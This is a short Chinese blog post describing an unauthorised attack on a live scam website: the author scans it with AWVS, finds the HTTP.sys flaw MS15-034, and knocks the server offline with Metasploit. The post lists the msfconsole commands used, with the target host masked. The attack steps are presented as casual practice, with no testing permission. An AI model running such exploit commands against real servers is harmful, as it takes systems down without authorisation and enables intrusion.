作者 by Tokeii / 2020-08-23 / 暂无评论 / 2159 个足迹
最近在找一些盗号网站、诈骗网站练手,于是我发现了一个网站,所谓的刷QB
打开AWVS扫一扫
发现一个经常遇到的严重漏洞,这个比较常见,解决方法百度~,以下是攻击过程
HTTP.sys 中的漏洞可能允许远程执行代码
打开kali-msf
这个漏洞对应的编号是MS15-034
我们search一波
设置好参数后,run一波,提示成功,服务器down掉了
相关代码
search ms15-034
use 0
set rhost www.******.com
set threads 10
set targeturi /*****
run
独特见解